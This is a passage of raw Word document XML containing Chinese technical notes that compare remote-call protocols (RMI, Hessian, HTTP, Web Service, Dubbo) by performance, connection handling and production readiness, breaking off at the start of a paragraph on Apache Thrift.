      </w:r>
      <w:r w:rsidR="00B0434A" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="008A3C6A" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>特别是在大数据量的情况下，与其他通讯协议的差距尤为明显</w:t>
      </w:r>
      <w:r w:rsidR="00463E14" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00C05FC8" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidR="00C05FC8" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>需要开防火墙端口，</w:t>
      </w:r>
      <w:r w:rsidR="00C05FC8" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hessian</w:t>
      </w:r>
      <w:r w:rsidR="00C05FC8" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>不用</w:t>
      </w:r>
      <w:r w:rsidR="0013053C" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F3A5B" w:rsidRPr="003561AC" w:rsidRDefault="001C3386" w:rsidP="003306A0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http </w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>超文本传输协议</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是互联网上应用最为广泛的一种网络协议，</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是一个客户端和</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器端请求和应答的标准。</w:t>
      </w:r>
      <w:r w:rsidR="003561AC" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r w:rsidR="003561AC" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3386" w:rsidRPr="003561AC" w:rsidRDefault="001C3386" w:rsidP="003306A0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web Service</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是一个平台独立的。低耦合的，自包含的。基于可编程的</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的应用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可使用开发的</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>标准来描述、发现、发布、协调和配置这些应用程序，用于开发分布式互操作的应用程序</w:t>
      </w:r>
      <w:r w:rsidR="00B8570C" w:rsidRPr="003561AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C344EF" w:rsidRDefault="00B8570C" w:rsidP="00CD3C39">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>复用单一长连接，并使用线程池并发处理请求，减少握手和加大并发效率，性能较好（推荐使用）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在大文件传输时，单一连接会成为瓶颈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可用于生产环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alibaba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Rmi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可与原生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>互操作，基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>偶尔会连接失败，需重建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Stub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可用于生产环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alibaba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8570C" w:rsidRDefault="00B8570C" w:rsidP="00C344EF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hessian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可与原生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hessian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>互操作，基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>需</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hessian.jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>支持，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>短连接的开销大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可用于生产环境</w:t>
      </w:r>
      <w:r w:rsidR="00F37368">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37368" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37368" w:rsidP="00CE2FA9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Thrift </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Facebook </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
